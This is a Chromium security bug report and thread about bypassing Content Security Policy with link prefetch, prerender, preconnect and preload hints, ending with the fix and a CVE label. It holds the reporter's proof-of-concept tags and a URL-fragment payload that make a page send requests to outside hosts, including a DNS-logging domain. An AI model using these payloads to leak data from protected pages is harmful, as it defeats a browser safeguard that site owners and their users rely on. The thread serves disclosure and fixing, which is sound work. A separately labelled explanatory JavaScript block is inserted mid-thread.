Issue 663620 Bypass unsafe-inline mode CSP
Starred by 3 users Reported by masa....@gmail.com, Nov 9 2016 Back to list
Status: Fixed
Owner:
Closed: Dec 2016
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 2
Type: Bug-Security
UserAgent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36

Steps to reproduce the problem:
PoC 1:
<link rel="prefetch" href="http://linux.im/test_prefetch.jpg">  

PoC 2:
<link rel="prerender" href="http://linux.im">  

PoC 3:
<link rel="dns-prefetch" href="http://linux.im">  

PoC 4:
<link rel="preconnect" href="http://1.111asd1-testcsp.n0tr00t.com">  

PoC 5:
<link rel="preload" href="//linux.im/styles/other.css">  

What is the expected behavior?
Refused to load the xxxxx

What went wrong?
Send a request

Did this work before? N/A

Chrome version: 54.0.2840.71 Channel: n/a
OS Version: 10.0
Flash Version: Shockwave Flash 23.0 r0

Author: evi1m0
Source: http://paper.seebug.org/91/
Components: Blink>SecurityFeature
Labels: Security_Severity-Low
Owner: mkwst@chromium.org
Hey mkwst@, would you mind taking a look at this one?
Comment 2 by mkwst@chromium.org, Nov 9 2016
Cc: mkwst@chromium.org
Owner: y...@yoav.ws
CSP doesn't restrict `prefetch`, `prerender`, `dns-prefetch`, or `preconnect`. It's arguable that it should (and we're talking about some of those in https://github.com/w3c/webappsec-csp/issues/107, where your opinions would certainly be appreciated).

`preload` should require an `as` attribute, and apply policy accordingly. yoav@, can you take a look at whether that's happening?
Comment 3 by y...@yoav.ws, Nov 9 2016
preload should apply policy according to the `as` attribute. If that attribute is missing, the applied policy should be `connect-src`.

Is there a test case that shows that this is not happening?
Project Member Comment 4 by sheriffbot@chromium.org, Nov 9 2016
Status: Assigned
Comment 5 by masa....@gmail.com, Nov 10 2016
Attackers do not need to use the `as` attribute when attacking.
Comment 6 by y...@yoav.ws, Nov 10 2016
True. Again, if that attribute is missing, the applied policy should be `connect-src`. If that's not the case, it's certainly a bug. Is this what you see? Do you have a test case that shows that?
Comment 7 by masa....@gmail.com, Nov 10 2016
See http://45.32.32.225/test.php

Content-Security-Policy:default-src 'self'; content-src 'none'; script-src 'self' 'unsafe-inline';

It can send a request to asd11111111a1121.vqn3j8.ceye.io .
Comment 8 by masa....@gmail.com, Nov 10 2016
PoC:
http://45.32.32.225/test2.php#<link rel=preload href=http://asd11111111a1121.vqn3j8.ceye.io/test.aaa>
Comment 9 by y...@yoav.ws, Nov 10 2016
Status: Started
Can recreate using my own test case.
Labels: -OS-Windows Security_Impact-Stable OS-All
I assume this impacts stable - let me know if I'm mistaken.
Project Member Comment 11 by bugdroid1@chromium.org, Nov 15 2016
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/872f27a9bceebb042082cd1b2f9043e5dd208200

commit 872f27a9bceebb042082cd1b2f9043e5dd208200
Author: yoav <yoav@yoav.ws>
Date: Tue Nov 15 10:07:46 2016

Apply connect-src for link preload with no `as` value

This fixes an issue where connect-src was not applied to preloaded resources, due to their Context.

BUG= 663620 

Review-Url: https://codereview.chromium.org/2491903002
Cr-Commit-Position: refs/heads/master@{#432158}

[modify] https://crrev.com/872f27a9bceebb042082cd1b2f9043e5dd208200/third_party/WebKit/Source/core/frame/csp/ContentSecurityPolicy.cpp
[modify] https://crrev.com/872f27a9bceebb042082cd1b2f9043e5dd208200/third_party/WebKit/Source/core/frame/csp/ContentSecurityPolicyTest.cpp

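As an added example (not Chromium's code, nor the reporter's or yoav's), this JavaScript models the policy logic described in comments 2 and 3 and in the fix commit above: `prefetch`, `prerender`, `dns-prefetch` and `preconnect` are not restricted by CSP, while `preload` is governed by the fetch directive matching its `as` value and falls back to `connect-src` when `as` is missing or unrecognised. Source-list matching is deliberately simplified to `'none'`, `'self'` and exact origins; the `as`-to-directive table is the mapping assumed here, not quoted from the page.

```javascript
// Added example, not Chromium code: which CSP directive governs a <link> hint.
// Assumed mapping of preload `as` values to fetch directives.
const PRELOAD_AS_TO_DIRECTIVE = {
  script: "script-src", style: "style-src", image: "img-src",
  font: "font-src", fetch: "connect-src", track: "media-src",
  audio: "media-src", video: "media-src",
};

// Returns the governing directive, or null when CSP does not restrict the
// hint at all (prefetch, prerender, dns-prefetch, preconnect; see comment 2).
function governingDirective(rel, as) {
  if (rel !== "preload") return null;
  // Missing or unrecognised `as` falls back to connect-src (the fix).
  return PRELOAD_AS_TO_DIRECTIVE[as] || "connect-src";
}

// Parses "name src src; name src" into a Map of directive -> source list.
function parsePolicy(header) {
  const directives = new Map();
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/);
    if (name) directives.set(name.toLowerCase(), sources);
  }
  return directives;
}

// true if the policy allows `url` to be requested for the given hint.
// Simplified source matching: 'none', 'self' and exact origins only.
function cspAllowsLink(header, rel, as, url, pageOrigin) {
  const directive = governingDirective(rel, as);
  if (directive === null) return true; // unrestricted by CSP
  const policy = parsePolicy(header);
  // Fetch directives fall back to default-src when absent.
  const sources = policy.get(directive) || policy.get("default-src");
  if (!sources) return true; // no applicable directive at all
  const target = new URL(url, pageOrigin).origin;
  return sources.some((src) => {
    const s = src.toLowerCase();
    if (s === "'none'") return false;
    if (s === "'self'") return target === pageOrigin;
    try { return new URL(s).origin === target; } catch { return false; }
  });
}
```

With the reporter's policy from comment 7, a `<link rel=preload>` without `as` to an external host resolves to `connect-src`, which is absent and so falls back to `default-src 'self'`, and the request is refused; the pre-fix behaviour was equivalent to `governingDirective` returning null for that case.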
Anything else to be done here, or can we mark as Fixed?
Labels: M-56
Status: Fixed
Project Member Comment 15 by sheriffbot@chromium.org, Dec 3 2016
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: Release-0-M56
Labels: CVE-2017-5022
Project Member Comment 18 by sheriffbot@chromium.org, Mar 11
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Issue 719242 has been merged into this issue.